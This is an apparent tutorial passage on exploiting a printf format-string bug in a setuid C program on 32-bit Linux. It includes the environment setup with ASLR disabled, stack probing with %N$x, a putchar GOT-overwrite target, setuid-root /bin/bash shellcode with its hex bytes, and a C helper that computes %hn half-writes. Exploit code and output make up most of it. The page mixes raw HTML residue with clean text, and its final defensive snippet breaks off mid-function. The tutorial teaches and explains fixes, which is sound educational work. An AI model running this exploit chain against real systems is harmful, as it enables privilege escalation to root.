class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[/spanspan 
class="mi"512/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strncpy/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"a/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"a/spanspan class="p")/spanspan class="o"+/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strcmp/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"PASS/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"printfile/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"FILE/spanspan class="w" /spanspan class="o"*/spanspan class="n"f/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"f/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"fopen/spanspan class="p"(/spanspan class="n"SFILE/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;rquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span 
class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"f/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"((/spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"getc/spanspan class="p"(/spanspan class="n"f/spanspan class="p"))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"EOF/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"putchar/spanspan class="p"(/spanspan class="n"c/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fclose/spanspan class="p"(/spanspan class="n"f/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error opening file: quot;/spanspan class="w" /spanspan class="n"SFILE/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table h3The Fix/h3 pThere are 2 lines in the above application that contain a format string vulnerability. The first is on line 18, it is part of the usage message and should be changed to codeprintf("%s", argv[0]);/code. 
The second, and the vulnerability that we will be attacking here, is on line 25; this should be changed to <code>printf("%s", argv[1]);</code> (or <code>fputs(argv[1], stdout);</code>, which avoids format processing altogether). The rule is the same for every printf-family function, <code>sprintf</code>, <code>snprintf</code> and <code>fprintf</code> included: the format is a literal, untrusted data arrives through <code>%s</code>.</p>

<h2>Setting Up The Environment</h2>

<p>The environment setup is exactly the same as in part 1, so if you have done part 1 you can skip this section. This is how to set up the environment in full on a Debian based system:</p>

```console
root@host:~# adduser testuser
Adding user `testuser' ...
Adding new group `testuser' (1001) ...
Adding new user `testuser' (1001) with group `testuser' ...
Creating home directory `/home/testuser' ...
Copying files from `/etc/skel' ...
Enter new UNIX password: 
Retype new UNIX password: 
passwd: password updated successfully
Changing the user information for testuser
Enter the new value, or press ENTER for the default
	Full Name []: 
	Room Number []: 
	Work Phone []: 
	Home Phone []: 
	Other []: 
Is the information correct? [Y/n]
root@host:~# ls
app.c
root@host:~# gcc -z execstack -fno-stack-protector -o app app.c
root@host:~# cp app /home/testuser/
root@host:~# cat /proc/sys/kernel/randomize_va_space 
2
root@host:~# echo 0 > /proc/sys/kernel/randomize_va_space
root@host:~# cat /proc/sys/kernel/randomize_va_space
0
root@host:~# cd /home/testuser/
root@host:/home/testuser# ls -l app
-rwxr-xr-x 1 root root 6242 Apr 17 16:48 app
root@host:/home/testuser# chmod u+s app
root@host:/home/testuser# ls -l app
-rwsr-xr-x 1 root root 6242 Apr 17 16:48 app
root@host:/home/testuser# echo 'This is a top secret file!
> Only people with the password should be able to view this file!' > secret.txt
root@host:/home/testuser# ls -l secret.txt
-rw-r--r-- 1 root root 91 May  9 13:40 secret.txt
root@host:/home/testuser# chmod 600 secret.txt
root@host:/home/testuser# ls -l secret.txt
-rw------- 1 root root 91 May  9 13:40 secret.txt
root@host:/home/testuser# cat secret.txt
This is a top secret file!
Only people with the password should be able to view this file!
root@host:/home/testuser# su - testuser
testuser@host:~$ ls -l app
-rwsr-xr-x 1 root root 6242 Apr 17 16:48 app
testuser@host:~$ ls -l secret.txt 
-rw------- 1 root root 91 May  9 13:40 secret.txt
testuser@host:~$ cat secret.txt
cat: secret.txt: Permission denied
```

<p>Two of those choices matter for this particular exploit. <code>-z execstack</code> is what lets shellcode placed in an environment variable execute, and the GOT overwrite used later depends on the binary not being linked with full RELRO (<code>-z relro -z now</code>, which shows up as a <code>GNU_RELRO</code> segment in <code>readelf -l</code> together with <code>BIND_NOW</code> in <code>readelf -d</code>); full RELRO maps the GOT read-only before <code>main</code> runs, while the default link here is at most partial RELRO and leaves the <code>.got.plt</code> entries writable. <code>-fno-stack-protector</code> is irrelevant for a format string bug and is only there to keep the build identical to part 1. Note also that the <code>randomize_va_space</code> setting does not survive a reboot.</p>

<h2>Testing The App / Finding The Vulnerability</h2>

<p>For this application it is very easy to find this vulnerability:</p>
```console
testuser@host:~$ ./app
Usage: ./app <password>
testuser@host:~$ ./app test
Wrong password: test
testuser@host:~$ ./app %x
Wrong password: bffff884
```

<p>What has happened here is that <code>printf</code> has treated our input as its format string: <code>%x</code> tells it to take its next argument and print it in hex, and since no argument was passed it reads the stack word that would have held one, the word just above the format pointer. Getting a stack address (<code>bffff884</code>) back instead of the literal text makes the format string vulnerability clear. A properly coded application would give the following result:</p>

```console
testuser@host:~$ ./app %x
Wrong password: %x
```

<h2>Developing The Exploit</h2>

<p>Now that we have discovered the vulnerability, we need to find a part of the stack that we control. glibc supports direct parameter access, <code>%N$x</code>, which prints the N-th argument without having to step through all the ones before it (the <code>$</code> is written as <code>\$</code> only because of the shell's double quotes):</p>

```console
testuser@host:~$ ./app "AAAA : %x"
Wrong password: AAAA : bffff874
testuser@host:~$ ./app "AAAA : %2\$x"
Wrong password: AAAA : bffff880
testuser@host:~$ ./app "AAAA : %3\$x"
Wrong password: AAAA : bffff7c8
testuser@host:~$ ./app "AAAA : %4\$x"
Wrong password: AAAA : b7e8d7f5
testuser@host:~$ ./app "AAAA : %5\$x"
Wrong password: AAAA : b7ff0590
```

<p>We need to do this until we find 41414141 (AAAA in hex). <code>argv[1]</code> lives among the argument strings near the top of the stack, a long way above <code>printf</code>'s frame, so this can take a while by hand; a little shell-fu makes it less painful (delete <code>/tmp/t</code> first if you rerun it, since the loop appends):</p>

```console
testuser@host:~$ for i in `seq 1 500`; do echo "./app \"AAAA : %$i\$x\"" >> /tmp/t; ./app "AAAA : %$i\$x" >> /tmp/t; done
testuser@host:~$ grep -B 1 41414141 /tmp/t
testuser@host:~$ grep -B 1 414141 /tmp/t
./app "AAAA : %123$x"
Wrong password: AAAA : 41414100
```

<p>So we know roughly where we are going to land. The exact index will shift a little as the exploit string grows, and the byte alignment depends on the string's length: <code>41414100</code> means the word at parameter 123 holds the terminating NUL of the previous string (<code>argv[0]</code>) followed by only three of our A's, because x86 is little-endian and the lowest byte prints last. The argument strings are laid out downwards from the top of the stack, so making <code>argv[1]</code> one byte longer moves it one byte lower and lines all four A's up in that word:</p>

```console
testuser@host:~$ ./app "AAAAC : %123\$x"
Wrong password: AAAAC : 41414141
```

<p>We are going to need two controlled words rather than one (you will find out why later), so let's add some B's and find both of them. Each character added or removed shifts the alignment by one byte, and four bytes of shift move the A's by one parameter:</p>

```console
testuser@host:~$ ./app "AAAABBBBC : %123\$x : %124\$x"
Wrong password: AAAABBBBC : 41007070 : 42414141
testuser@host:~$ ./app "AAAABBBBCC : %123\$x : %124\$x"
Wrong password: AAAABBBBCC : 41410070 : 42424141
testuser@host:~$ ./app "AAAABBBB : %123\$x : %124\$x"
Wrong password: AAAABBBB : 707061 : 41414141
testuser@host:~$ ./app "AAAABBBB : %124\$x : %125\$x"
Wrong password: AAAABBBB : 41414141 : 42424242
```

<p>So now we control two consecutive 4-byte words on the stack, parameters 124 and 125 (the positions may still move a little along the way, and we will always correct for that with the same method). So far we have only used the <code>%x</code> conversion specifier; most implementations also provide <code>%n</code>, and that is what is needed to actually write to memory with this vulnerability. <code>%n</code> takes a pointer argument, just as <code>%x</code> takes an integer, and stores the number of characters printed so far by this call at that address (<code>%hn</code> stores only the low 16 bits, <code>%hhn</code> the low 8). Since we control which stack words are fetched as arguments, we can put an address of our choosing into one of those words and have <code>printf</code> write to it, and we control the value written by how much is printed first: a field width such as <code>%5000x</code> pads one conversion to at least that many characters. With that we should be able to run our own code.</p>
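<p>To make the two bits of arithmetic above concrete, here is a small C program, added to this write-up rather than taken from the original post, that does both mechanically. <code>align_shift</code> turns the word that <code>%N$x</code> printed (such as <code>41414100</code>) into the number of bytes the input must grow for the A's to fill parameter N exactly, and <code>write_u32_with_hn</code> writes a chosen 32-bit value, for instance the address of some shellcode, into a target word as two <code>%hn</code> half-writes, smaller half first, with the field widths worked out for it. The function and struct names are mine. Rather than relying on stack layout, which differs per compiler and on x86-64 puts the first arguments in registers, the demo passes the two half pointers to a real <code>snprintf</code> as arguments 2 and 3 and uses a dummy argument 1 for the padding; in the attack those pointers are the eight bytes at the front of <code>argv[1]</code> and the indices are the 124 and 125 found above. It assumes a little-endian machine and a glibc-style <code>printf</code> with positional parameters, and it sidesteps the fortified <code>snprintf</code> wrapper, which refuses <code>%n</code> in a writable format string.</p>

```c
/* Added example for this tutorial, not code from the original post.
 * align_shift, plan_halves, write_u32_with_hn and demo_write are names
 * chosen for this edit. Assumes little-endian x86 and a glibc-style
 * printf with positional (%N$) parameters. */
#undef _FORTIFY_SOURCE   /* the fortified *printf_chk aborts on %n in a writable format string */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#if __BYTE_ORDER__ != __ORDER_LITTLE_ENDIAN__
#error "the half-write order below assumes a little-endian machine"
#endif

/* Given the word %N$x printed, how many bytes must the input grow so the
 * four A's fill parameter N? The hex reads high byte first, so 0x41414100
 * is "\0AAA" in memory with the A's starting at byte 1: grow by 1.
 * Shrinking by (4 - result) instead moves the A's to the start of
 * parameter N+1, which is what the walkthrough did. -1 if no A at all. */
static int align_shift(uint32_t word)
{
    int a = 0;   /* consecutive 'A' bytes counted from the high end */
    while (a < 4 && ((word >> (8 * (3 - a))) & 0xffu) == 0x41u)
        a++;
    return a == 0 ? -1 : 4 - a;
}

struct half_write {
    unsigned short *where;   /* 2-byte slot this %hn hits */
    unsigned want;           /* 16-bit value it must receive */
    unsigned pad;            /* field width printed right before it */
};

/* Split value into two 16-bit halves, smaller one written first so the
 * second only has to print the difference. %hn stores the count mod
 * 65536, so a 4-byte address costs at most ~131k characters instead of
 * the ~3 GB a single %n would need. already_printed is whatever precedes
 * the first %x in the same call (in the attack: the 8 address bytes). */
static void plan_halves(uint32_t *target, uint32_t value, unsigned already_printed,
                        struct half_write out[2])
{
    struct half_write lo = { (unsigned short *)target,     value & 0xffffu, 0 };
    struct half_write hi = { (unsigned short *)target + 1, value >> 16,     0 };
    unsigned printed = already_printed & 0xffffu;
    int i;

    if (lo.want <= hi.want) { out[0] = lo; out[1] = hi; }
    else                    { out[0] = hi; out[1] = lo; }
    for (i = 0; i < 2; i++) {
        unsigned need = (out[i].want - printed) & 0xffffu;
        if (need == 0)
            need = 0x10000;   /* %x prints at least one char, so go round once */
        out[i].pad = need;
        printed = out[i].want;
    }
}

/* Build the attacker-style format "<prefix>%1$<pad>x%2$hn%1$<pad>x%3$hn"
 * and feed it to a real snprintf, the way printf(argv[1]) consumes it.
 * Argument 1 is a dummy integer that only supplies padding; 2 and 3 are
 * the half pointers (on the stack in the attack, passed here). 0 = ok. */
static int write_u32_with_hn(uint32_t *target, uint32_t value, unsigned already_printed)
{
    struct half_write w[2];
    char fmt[96];
    size_t cap = (size_t)1 << 18;   /* two full 65536-char pads plus prefix fit */
    char *scratch;
    int (*raw_snprintf)(char *, size_t, const char *, ...) = snprintf;
    int n;

    if (already_printed > 32)
        return -1;   /* keeps the demo's format buffer small */
    plan_halves(target, value, already_printed, w);
    memset(fmt, 'A', already_printed);   /* stand-in for the address bytes */
    snprintf(fmt + already_printed, sizeof fmt - already_printed,
             "%%1$%ux%%2$hn%%1$%ux%%3$hn", w[0].pad, w[1].pad);

    scratch = malloc(cap);
    if (scratch == NULL)
        return -1;
    /* raw_snprintf is a plain pointer to libc's snprintf, so the fortified
     * inline wrapper is bypassed even if a system header preceded the #undef. */
    n = raw_snprintf(scratch, cap, fmt, 0u, w[0].where, w[1].where);
    free(scratch);
    return n < 0 ? -1 : 0;
}

/* Write value into a fresh word and hand back what the word then holds. */
static uint32_t demo_write(uint32_t value, unsigned already_printed)
{
    uint32_t word = 0;
    if (write_u32_with_hn(&word, value, already_printed) != 0)
        abort();
    return word;
}

int main(void)
{
    printf("41414100 -> grow input by %d\n", align_shift(0x41414100u));
    printf("41007070 -> grow input by %d\n", align_shift(0x41007070u));
    /* 0xbffff7c8 is one of the stack addresses seen above; the target is a
     * local word standing in for a GOT slot. */
    printf("wrote %08x after 8 prefix bytes\n", demo_write(0xbffff7c8u, 8));
    return 0;
}
```

<p>The last line printed shows the target word equal to the value asked for. The <code>0x10000</code> wrap in <code>plan_halves</code> is what handles a half that is zero or smaller than what has already been printed, and the <code>already_printed</code> prefix is why the real exploit's padding has to account for the address bytes sitting at the front of the string.</p>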
<p>Still a little bit of work to do, but we are getting there. Next we need to figure out the memory address that we want to write to. For this we will use the global offset table (GOT): calls from the program into shared library functions such as <code>printf</code>, <code>putchar</code> and <code>strlen</code> go through a PLT stub that jumps to a pointer stored in the GOT, and the dynamic linker fills those pointers in lazily at the first call, which is why the table is left writable in a normally linked Linux binary (one linked with full RELRO has it mapped read-only before <code>main</code> runs). Overwrite the GOT entry of a function that gets called after the vulnerable <code>printf</code> and the next call to that function lands wherever we put it.</p>

<p>First let's look at the disassembly to see which function we need to write to:</p>

```console
testuser@host:~$ gdb -q ./app
Reading symbols from /home/testuser/app...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
   0x0804860c <+0>:     push   ebp
   0x0804860d <+1>:     mov    ebp,esp
   0x0804860f <+3>:     and    esp,0xfffffff0
   0x08048612 <+6>:     sub    esp,0x20
   0x08048615 <+9>:     cmp    DWORD PTR [ebp+0x8],0x1
   0x08048619 <+13>:    jg     0x804864c <main+64>
   0x0804861b <+15>:    mov    DWORD PTR [esp],0x80487f0
   0x08048622 <+22>:    call   0x8048470 <printf@plt>
   0x08048627 <+27>:    mov    eax,DWORD PTR [ebp+0xc]
   0x0804862a <+30>:    mov    eax,DWORD PTR [eax]
   0x0804862c <+32>:    mov    DWORD PTR [esp],eax
   0x0804862f <+35>:    call   0x8048470 <printf@plt>
   0x08048634 <+40>:    mov    DWORD PTR [esp],0x80487f8
   0x0804863b <+47>:    call   0x80484a0 <puts@plt>
   0x08048640 <+52>:    mov    DWORD PTR [esp],0x1
   0x08048647 <+59>:    call   0x80484c0 <exit@plt>
   0x0804864c <+64>:    mov    eax,DWORD PTR [ebp+0xc]
   0x0804864f <+67>:    add    eax,0x4
   0x08048652 <+70>:    mov    eax,DWORD PTR [eax]
   0x08048654 <+72>:    mov    DWORD PTR [esp],eax
   0x08048657 <+75>:    call   0x80486a2 <checkpass>
   0x0804865c <+80>:    mov    DWORD PTR [esp+0x1c],eax
   0x08048660 <+84>:    cmp    DWORD PTR [esp+0x1c],0x0
   0x08048665 <+89>:    je     0x804869b <main+143>
   0x08048667 <+91>:    mov    DWORD PTR [esp],0x8048804
   0x0804866e <+98>:    call   0x8048470 <printf@plt>
   0x08048673 <+103>:   mov    eax,DWORD PTR [ebp+0xc]
   0x08048676 <+106>:   add    eax,0x4
   0x08048679 <+109>:   mov    eax,DWORD PTR [eax]
   0x0804867b <+111>:   mov    DWORD PTR [esp],eax
   0x0804867e <+114>:   call   0x8048470 <printf@plt>
   0x08048683 <+119>:   mov    DWORD PTR [esp],0xa
   0x0804868a <+126>:   call   0x8048500 <putchar@plt>
   0x0804868f <+131>:   mov    DWORD PTR [esp],0x1
   0x08048696 <+138>:   call   0x80484c0 <exit@plt>
   0x0804869b <+143>:   call   0x80486f0 <printfile>
   0x080486a0 <+148>:   leave
   0x080486a1 <+149>:   ret
End of assembler dump.
```

<p>You could do a bit of debugging to figure out which call to <code>printf</code> is vulnerable, but it can be read straight off the listing: it is the call at <code>main+114</code> (<code>0x0804867e</code>). That is the second <code>printf</code> after the call to <code>checkpass</code> at <code>main+75</code>, and its argument is loaded from <code>[ebp+0xc]+4</code>, which is <code>argv[1]</code>; the first one, at <code>main+98</code>, is handed the constant address of the "Wrong password: " string.</p>

<p>Right after it, at <code>main+126</code>, is a call to <code>putchar</code>: the compiler has turned <code>printf("\n")</code> on line 26 into <code>putchar(0xa)</code> (and the <code>" &lt;password&gt;\n"</code> in the usage message into <code>puts</code>), so the GOT has a <code>putchar</code> slot even though the source never calls it in <code>main</code>. That is the call we will hijack, so now we need to find where its GOT entry is in memory:</p>
class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spanobjdump --dynamic-reloc ./app/span span class="code-line"/span span class="code-line"span class="go"./app: file format elf32-i386/span/span span class="code-line"/span span class="code-line"span class="go"DYNAMIC RELOCATION RECORDS/span/span span class="code-line"span class="go"OFFSET TYPE VALUE/span/span span class="code-line"span class="go"08049a1c R_386_GLOB_DAT __gmon_start__/span/span span class="code-line"span class="go"08049a2c R_386_JUMP_SLOT strcmp/span/span span class="code-line"span class="go"08049a30 R_386_JUMP_SLOT printf/span/span span class="code-line"span class="go"08049a34 R_386_JUMP_SLOT fclose/span/span span class="code-line"span class="go"08049a38 R_386_JUMP_SLOT _IO_getc/span/span span class="code-line"span class="go"08049a3c R_386_JUMP_SLOT puts/span/span span class="code-line"span class="go"08049a40 R_386_JUMP_SLOT __gmon_start__/span/span span class="code-line"span class="go"08049a44 R_386_JUMP_SLOT exit/span/span span class="code-line"span class="go"08049a48 R_386_JUMP_SLOT strlen/span/span span class="code-line"span class="go"08049a4c R_386_JUMP_SLOT __libc_start_main/span/span span 
class="code-line"span class="go"08049a50 R_386_JUMP_SLOT fopen/span/span span class="code-line"span class="go"08049a54 R_386_JUMP_SLOT putchar/span/span span class="code-line"span class="go"08049a58 R_386_JUMP_SLOT strncpy/span/span span class="code-line"/code/pre/div /td/tr/table pLine 18 is where our pointer to putchar is, it shows us that the pointer is at 08049a54 so this is the address that we need to write to./p pNext to find what address we want to write (the address of our shellcode so when putchar is called, our shellcode is run), we'll use the same method as in the last demonstration, we'll stick our shellcode in an environment variable and use getenv to figure out where it'll be in memory, we're also using the same shellcode as in part 1:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span 
class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="c1"; run /bin/bash/span/span span class="code-line"/span span class="code-line"span class="k"global /spanspan class="nv"_start/span/span span class="code-line"/span span class="code-line"span class="k"section /spanspan class="nv".text/span/span span class="code-line"/span span class="code-line"span class="nl"_start:/span/span span class="code-line" span class="nf"jmp/span span class="nv"short/span span 
class="nv"Call_shellcode/span span class="c1"; jump to where our string is/span/span span class="code-line"/span span class="code-line"span class="nl"shellcode:/span/span span class="code-line" span class="nf"xor/span span class="nb"eax/spanspan class="p",/span span class="nb"eax/span span class="c1"; zero out eax/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"al/spanspan class="p",/span span class="mh"0x17/span span class="c1"; put 23 into eax to setuid/span/span span class="code-line"/span span class="code-line" span class="nf"xor/span span class="nb"ebx/spanspan class="p",/span span class="nb"ebx/span span class="c1"; zero out ebx/span/span span class="code-line"/span span class="code-line" span class="nf"int/span span class="mh"0x80/span span class="c1"; make the syscall setuid/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"eax/spanspan class="p",/span span class="nb"ebx/span span class="c1"; zero out eax/span/span span class="code-line"/span span class="code-line" span class="nf"pop/span span class="nb"ebx/span span class="c1"; pop the address of our string into ebx/span/span span class="code-line" span class="c1"; which is the first argument to execve/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="p"[/spanspan class="nb"ebx/span span class="o"+/spanspan class="mi"9/spanspan class="p"],/span span class="nb"al/span span class="c1"; put a 0 where the A is to null/span/span span class="code-line" span class="c1"; terminate the /bin/bash string/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"al/spanspan class="p",/span span class="mh"0xb/span span class="c1"; put the sys call number 11 into eax/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="p"[/spanspan class="nb"ebx/span span class="o"+/spanspan 
class="mi"10/spanspan class="p"],/span span class="nb"ebx/span span class="c1"; put a pointer to the beginning/span/span span class="code-line" span class="c1"; of the string where the BBBB is/span/span span class="code-line"/span span class="code-line" span class="nf"xor/span span class="nb"ecx/spanspan class="p",/span span class="nb"ecx/span span class="c1"; zero out the ecx register/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="p"[/spanspan class="nb"ebx/span span class="o"+/spanspan class="mi"14/spanspan class="p"],/span span class="nb"ecx/span span class="c1"; replace the CCCC with 0000/span/span span class="code-line"/span span class="code-line" span class="nf"lea/span span class="nb"ecx/spanspan class="p",/span span class="p"[/spanspan class="nb"ebx/span span class="o"+/spanspan class="mi"10/spanspan class="p"]/span span class="c1"; load the address that used to/span/span span class="code-line" span class="c1"; point to BBBB into ecx the second/span/span span class="code-line" span class="c1"; argument to execve/span/span span class="code-line"/span span class="code-line" span class="nf"lea/span span class="nb"edx/spanspan class="p",/span span class="p"[/spanspan class="nb"ebx/span span class="o"+/spanspan class="mi"14/spanspan class="p"]/span span class="c1"; load the address that used to/span/span span class="code-line" span class="c1"; point to CCCC into edx the third/span/span span class="code-line" span class="c1"; argument to execve/span/span span class="code-line"/span span class="code-line" span class="nf"int/span span class="mh"0x80/span span class="c1"; execute the syscall execve/span/span span class="code-line"/span span class="code-line"span class="nl"Call_shellcode:/span/span span class="code-line" span class="nf"call/span span class="nv"shellcode/span span class="c1"; call the start of the actual application/span/span span class="code-line" span class="nl"shell:/span span class="kd"db/span span 
class="s"quot;/bin/bashABBBBCCCCquot;/span span class="c1"; our string of/span/span span class="code-line" span class="c1"; arguments to execve/span/span span class="code-line"/code/pre/div /td/tr/table pNow we need to assemble, link, extract our shellcode then put it into an environment varable:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spannasm -f elf32 -o shell2.o shell2.nasm/span span class="code-line"span class="gp"[email protected]:~$ /spanld -o shell2 shell2.o/span span class="code-line"span class="gp"[email protected]:~$ /spanobjdump -d ./shell2span class="p"|/spangrep span class="s1"#39;[0-9a-f]:#39;/spanspan class="p"|/spangrep -v span class="s1"#39;file#39;/spanspan class="p"|/spancut -f2 -d:span class="p"|/spancut -f1-6 -dspan class="s1"#39; #39;/spanspan class="p"|/spantr -s span class="s1"#39; #39;/spanspan class="p"|/spantr span class="s1"#39;\t#39;/span span class="s1"#39; #39;/spanspan class="p"|/spansed span class="s1"#39;s/ $//g#39;/spanspan class="p"|/spansed span class="s1"#39;s/ /\\x/g#39;/spanspan class="p"|/spanpaste -d span class="s1"#39;#39;/span -s span class="p"|/spansed span class="s1"#39;s/^/quot;/#39;/spanspan class="p"|/spansed span class="s1"#39;s/$/quot;/g#39;/span/span span class="code-line"span 
class="go"quot;\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43quot;/span/span span class="code-line"span class="gp"[email protected]:~$ /spanspan class="nb"export/span span class="nv"SHELLCODE/spanspan class="o"=/spanspan class="k"$(/spanpython -c span class="s1"#39;print quot;\x90quot; * 500 + quot;\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43quot;#39;/spanspan class="k")/span/span span class="code-line"span class="gp"[email protected]:~$ /span./getenvaddr SHELLCODE ./app/span span class="code-line"span class="go"SHELLCODE will be at 0xbffff76d/span/span span class="code-line"/code/pre/div /td/tr/table pSo we have our address to write to '08049a54' and the address we want to write '0xbffff76d'./p pThe address we want to write is a very big number, this is why we need to control 2 addresses, we split the number in half, first we'll figure out how to write 'f76d', and then 'bfff'. 
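Before working out the two half-writes, here is the defender's side of the same bug, as an added example that is not part of the original tutorial: the source fix (pass the user's text as data, never as the format), a small detection check, and in the comments the build flags that would have made the GOT slot found above read-only. The helper names and the "Wrong password: " message shape are assumptions modelled on the app.

```c
#include <stdio.h>
#include <string.h>

/* The defect this walkthrough exploits is the app handing argv[1] to printf
 * as the *format* argument, so a "%n" in the argument becomes a store. The
 * fix is to pass untrusted text as data behind a fixed format. This helper
 * renders into a caller buffer so the result can be checked; the
 * "Wrong password: " prefix mirrors the app's message (assumed). */
int render_wrong_password(char *out, size_t outsz, const char *user_input) {
    /* user_input is an argument, never the format: "%124$n" is copied as text */
    return snprintf(out, outsz, "Wrong password: %s", user_input);
}

/* Self-check: 1 if user_input survives rendering byte-for-byte. */
int renders_literally(const char *user_input) {
    char out[256];
    const char *prefix = "Wrong password: ";
    size_t plen = strlen(prefix);
    int n = render_wrong_password(out, sizeof out, user_input);
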